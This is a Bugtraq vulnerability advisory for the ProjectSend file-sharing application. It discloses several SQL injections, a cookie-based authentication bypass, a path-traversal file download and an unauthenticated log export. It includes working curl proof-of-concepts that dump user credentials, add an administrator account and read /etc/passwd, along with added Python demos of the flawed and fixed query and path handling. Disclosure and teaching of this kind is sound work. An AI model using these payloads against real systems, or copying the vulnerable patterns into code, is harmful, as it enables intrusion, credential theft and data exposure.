
List:       bugtraq
Subject:    ProjectSend multiple vulnerabilities
From:       Filippo Cavallarin <filippo.cavallarin@wearesegment.com>
Date:       2016-01-29 11:59:15
Message-ID: D4976246-6CE9-40C1-8AD9-F3D57356B6DF@wearesegment.com

Advisory ID:  SGMA-16001
Title:  ProjectSend multiple vulnerabilities
Product:  ProjectSend (previously cFTP)
Version:  r582 and probably prior
Vendor:  www.projectsend.org
Vulnerability type:  SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
Risk level:  4 / 5
Credit:  filippo.cavallarin@wearesegment.com
CVE:  N/A
Vendor notification:  2015-11-05
Vendor fix:  N/A
Public disclosure:  2016-01-29


ProjectSend (previously cFTP) suffers from multiple vulnerabilities:


- SQL Injection

The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a SQL query without being properly sanitized. In order to exploit this issue, an attacker must be logged into the application as a non-privileged user. The following proof-of-concept demonstrates this issue by downloading the login credentials of registered users:

curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"



- SQL Injection

The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files" is used to build a SQL query without being properly sanitized. In order to exploit this issue, an attacker must be logged into the application as a non-privileged user. The following proof-of-concept demonstrates this issue by injecting a SLEEP() call into the database engine (a time-based, blind confirmation: the response is delayed by about ten seconds):

curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'



- SQL Injection

The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients" is used to build a SQL query without being properly sanitized. In order to exploit this issue, an attacker must be logged into the application as a non-privileged user. There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63. Note that the call to mysql_real_escape_string() gives no protection here: the joined list is interpolated unquoted into the IN (...) clause, so a payload needs no quote characters and passes through the escaping unchanged.

    $selected_clients = $_POST['selected_clients'];
    $clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
    $sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");



- SQL Injection

The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a SQL query without being properly sanitized. In order to exploit this issue, an attacker must be logged into the application as a non-privileged user. There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.

    $status_filter = $_POST['status'];
    $cq .= " AND active='$status_filter'";
    [...]
    $sql = $database->query($cq);



- SQL Injection

The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter "file" is used to build a SQL query without being properly sanitized. There is no POC available, but the vulnerability is easy to spot by looking at the source code.

    $files_to_zip = explode(',',substr($_GET['file'], 0, -1));
    [...]
    foreach ($files_to_zip as $file_to_zip) {
    [...]
    $sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' . $file_to_zip .'"');



- SQL Injection

The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used to build a SQL query without being properly sanitized. There is no POC available, but the vulnerability is easy to spot by looking at the source code.

    $log_action = $_GET['action'];
    $log_query = "SELECT * FROM tbl_actions_log";
    if (!empty($log_action)) {
        $log_query .= " WHERE action = '$log_action'";
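The clients.php, process-zip-download.php and home-log.php snippets above share two query-building patterns: a comma-joined list interpolated unquoted into IN (...), where mysql_real_escape_string() cannot help because the payload needs no quote characters, and a request value spliced directly into a quoted literal. The following Python/SQLite script is an added example, not ProjectSend code and not part of the original advisory; it reproduces both patterns against a constructed tbl_users table, shows the injections going through, and contrasts each with a parameterised query. The table layout, the row contents and the mysql_real_escape_string() stand-in are assumptions made for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the ProjectSend users table (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE tbl_users (id INTEGER, name TEXT, user TEXT, password TEXT, active INTEGER);
        INSERT INTO tbl_users VALUES (1, 'Alice', 'alice', 'hash-a', 1);
        INSERT INTO tbl_users VALUES (2, 'Bob',   'bob',   'hash-b', 0);
        INSERT INTO tbl_users VALUES (3, 'Carol', 'carol', 'hash-c', 1);
        """
    )
    return db


def mysql_real_escape_string(value: str) -> str:
    """Stand-in for PHP's mysql_real_escape_string(): backslash-escapes the
    characters that function handles. It never adds quotes, so it only helps
    when the caller wraps the result in a quoted literal."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


# --- Pattern 1: clients.php, selected_clients[] -> IN (...) ----------------

def clients_vulnerable(db, selected_clients):
    """Mirrors clients.php line 63: escaping the joined list achieves nothing,
    because the value lands unquoted inside IN (...)."""
    clients_to_get = mysql_real_escape_string(",".join(dict.fromkeys(selected_clients)))
    sql = f"SELECT id, name FROM tbl_users WHERE id IN ({clients_to_get})"
    return db.execute(sql).fetchall()


def clients_hardened(db, selected_clients):
    """Cast every element to int (anything else raises ValueError) and bind
    each one through a placeholder; the SQL text never contains user data."""
    ids = [int(c) for c in dict.fromkeys(selected_clients)]
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT id, name FROM tbl_users WHERE id IN ({placeholders})"
    return db.execute(sql, ids).fetchall()


# --- Pattern 2: status / action / url -> quoted literal --------------------

def status_filter_vulnerable(db, status):
    """Mirrors clients.php line 146 (the home-log.php and
    process-zip-download.php literals are the same shape): the request
    value is concatenated straight into a quoted string."""
    cq = "SELECT id, name FROM tbl_users WHERE 1=1"
    cq += f" AND active='{status}'"
    return db.execute(cq).fetchall()


def status_filter_hardened(db, status):
    """Same query with the value bound as a parameter."""
    cq = "SELECT id, name FROM tbl_users WHERE 1=1 AND active=?"
    return db.execute(cq, (status,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("IN-clause, normal  :", clients_vulnerable(db, ["1", "3"]))
    print("IN-clause, payload :", clients_vulnerable(db, ["1) OR 1=1 --"]))
    try:
        clients_hardened(db, ["1) OR 1=1 --"])
    except ValueError as err:
        print("IN-clause, hardened rejects payload:", err)
    print("literal, normal    :", status_filter_vulnerable(db, "1"))
    print("literal, payload   :", status_filter_vulnerable(db, "' OR '1'='1"))
    print("literal, hardened  :", status_filter_hardened(db, "' OR '1'='1"))
```

The IN-clause payload `1) OR 1=1 --` is the same shape as the advisory's `5) OR 1=sleep(10` for manage-files.php: close the parenthesis the application opened, append a condition, and comment out the rest. The point of the hardened variants is not escaping but keeping user input out of the SQL text entirely: a cast plus placeholders for the list, a bound parameter for the literal.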



- Authentication Bypass

An Authentication Bypass vulnerability has been discovered in multiple pages.
By adding a "userlevel" cookie to the request it is possible to bypass certain authentication checks and gain access to protected resources without a valid session: the pages trust the privilege level supplied by the client instead of the one stored server-side.
The following proof-of-concepts are available:

Lists all registered users:
curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'

Add an Admin user to the database:
curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'


Read file statistics:
curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'

Read file details:
curl 'http://projectsend.local/edit-file.php?file_id=1' -H 'Cookie: userlevel=9'

Bypass authentication on process-zip-download.php (the page abused by the Arbitrary File Download below):
curl 'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'


- Arbitrary File Download

The page process-zip-download.php fails to restrict access to local files.
By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary file from the server.
By combining this vulnerability with the Authentication Bypass affecting the same file, it is possible for a non-authenticated user to gain access to protected data.
The following proof-of-concept is available. Note the doubled letter in "passwdd": the script's substr($_GET['file'], 0, -1) call (shown above) discards the last character of the parameter, so the extra character is what gets thrown away and the request resolves to /etc/passwd.

curl 'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip
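To make the trailing-character quirk of the PoC concrete and show what a containment check looks like, here is an added Python example that is not ProjectSend code and not part of the original advisory. parse_file_param() mirrors the explode()/substr() line quoted earlier; the two resolve_*() functions are assumptions about how the resulting name is mapped to a file on disk (that step is not shown in the advisory), with the vulnerable join placed beside a realpath-plus-commonpath check. The directory layout and file contents are constructed for the demo.

```python
import os
import tempfile


def parse_file_param(value: str) -> list:
    """Mirrors explode(',', substr($_GET['file'], 0, -1)) from
    process-zip-download.php: the last character of the raw parameter is
    dropped (presumably meant to strip a trailing comma) and the rest is
    split on commas. This is why the PoC requests /etc/passwdd: the final
    'd' is the character that gets discarded."""
    return value[:-1].split(",")


def resolve_unsafe(upload_dir: str, name: str) -> str:
    """Assumed vulnerable pattern (not shown in the advisory): join the
    requested name onto the upload directory with no containment check."""
    return os.path.join(upload_dir, name)


def resolve_safe(upload_dir: str, name: str) -> str:
    """Canonicalise both paths and refuse anything that leaves upload_dir.
    realpath() also collapses symlinks, so a link planted inside the
    upload directory cannot be used to point outside it."""
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{name!r} resolves outside {upload_dir}")
    return target


def demo() -> dict:
    """Constructed layout: <root>/upload/report.pdf is a legitimate upload,
    <root>/secret.txt is a file the application must never serve."""
    with tempfile.TemporaryDirectory() as root:
        upload = os.path.join(root, "upload")
        os.mkdir(upload)
        with open(os.path.join(upload, "report.pdf"), "w") as fh:
            fh.write("pdf-bytes")
        with open(os.path.join(root, "secret.txt"), "w") as fh:
            fh.write("not-for-download")

        result = {}
        # Attacker-controlled value, built the way the PoC builds it:
        # a traversal sequence plus one sacrificial trailing character.
        requested = parse_file_param("../secret.txtX")[0]

        with open(resolve_unsafe(upload, requested)) as fh:
            result["unsafe_read"] = fh.read()

        try:
            resolve_safe(upload, requested)
            result["safe_blocked"] = False
        except PermissionError:
            result["safe_blocked"] = True

        # A legitimate request, with the trailing comma the substr() expects.
        legit = parse_file_param("report.pdf,")[0]
        with open(resolve_safe(upload, legit)) as fh:
            result["safe_read"] = fh.read()
        return result


if __name__ == "__main__":
    print(parse_file_param("../../../../../../../../etc/passwdd"))
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment check is deliberately done on the canonicalised absolute path rather than by looking for ".." in the input: encoded or mixed separators, redundant segments and symlinks all collapse under realpath(), so the comparison against the canonical base directory is the property that actually matters.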



- Insecure Direct Object References

The page includes/actions.log.export.php fails to perform any authentication check, so it is possible for anyone to access the log data.
The following proof-of-concept is available:

curl http://projectsend.local/includes/actions.log.export.php




Solution
No solution is available at the time of writing.
The vendor was contacted about three months before the public disclosure, but stopped responding after we sent our report.




References
https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
http://www.projectsend.org




Filippo Cavallarin
https://wearesegment.com



